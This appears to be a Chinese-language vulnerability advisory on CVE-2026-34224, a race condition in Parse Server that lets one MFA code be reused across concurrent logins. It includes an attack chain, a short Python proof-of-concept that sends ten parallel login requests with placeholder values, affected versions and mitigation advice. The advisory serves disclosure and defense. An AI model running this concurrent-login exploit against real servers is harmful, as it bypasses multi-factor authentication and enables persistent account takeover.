CVE-2026-34224 CVSS 4.4 中危

CVE-2026-34224 Parse Server MFA绕过漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34224

漏洞类型

认证绕过

CVSS评分

4.4 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Parse Server

漏洞概述

Parse Server是一款基于Node.js的开源后端框架。在8.6.64和9.7.0-alpha.8版本之前，该系统存在逻辑缺陷。攻击者若持有有效的身份提供商令牌及单个MFA恢复代码或短信OTP，可通过向authData端点发送并发登录请求，绕过MFA代码的单次使用限制。这导致攻击者能创建多个经过身份验证的会话，并在合法用户撤销部分会话后仍保持对系统的持续访问。

技术细节

该漏洞的核心在于Parse Server处理并发MFA验证请求时缺乏必要的原子性操作。通常情况下，MFA恢复代码或短信OTP应当在使用后立即失效。然而，当攻击者利用并发技术同时发送多个包含相同MFA代码的登录请求时，服务器可能在处理第一个请求并标记代码为“已使用”之前，通过了后续请求的验证。这种竞态条件使得原本仅限单次使用的凭证被多次复用。成功利用该漏洞后，攻击者不仅绕过了多因素认证的安全保障，还能建立多个独立会话，极大地增加了攻击检测和清理的难度。

攻击链分析

STEP 1

1. 身份凭证获取

攻击者首先需要获取受害者的有效身份验证提供商令牌以及一个MFA恢复代码或短信OTP。

STEP 2

2. 并发请求构造

攻击者编写脚本，利用获取到的凭证，针对Parse Server的authData登录端点构造并发登录请求。

STEP 3

3. 竞态条件触发

同时发送多个请求，利用服务器处理并发请求时的延迟或缺乏锁机制，使得同一个MFA代码被多次验证通过。

STEP 4

4. 会话持久化

成功获取多个有效的Session Token，即使合法用户察觉并撤销了部分会话，攻击者仍保留其他会话的访问权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import threading

# Target configuration
TARGET_URL = "https://<your-parse-server>/parse/login"
APP_ID = "<your-app-id>"
AUTH_PROVIDER_TOKEN = "<valid_auth_token>"
MFA_CODE = "<single_use_mfa_code>"

def send_login_request():
    headers = {
        "X-Parse-Application-Id": APP_ID,
        "Content-Type": "application/json"
    }
    payload = {
        "authData": {
            "provider": "<provider_name>",
            "token": AUTH_PROVIDER_TOKEN,
            "mfa_code": MFA_CODE
        }
    }
    try:
        response = requests.post(TARGET_URL, json=payload, headers=headers)
        if response.status_code == 200:
            print(f"[+] Login successful! Session Token: {response.json().get('sessionToken')}")
        else:
            print(f"[-] Login failed: {response.text}")
    except Exception as e:
        print(f"[!] Error: {e}")

# Create multiple threads to simulate concurrent requests (Race Condition)
threads = []
for i in range(10):
    t = threading.Thread(target=send_login_request)
    threads.append(t)
    t.start()

for t in threads:
    t.join()

影响范围

Parse Server < 8.6.64

Parse Server >= 9.0.0, < 9.7.0-alpha.8

防御指南

临时缓解措施

在无法立即升级的情况下，建议管理员实施严格的API速率限制策略，以减少并发攻击的可能性。同时，应密切监控日志中是否存在同一MFA代码在短时间内多次验证成功的异常行为，并及时通知用户重置MFA凭证。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表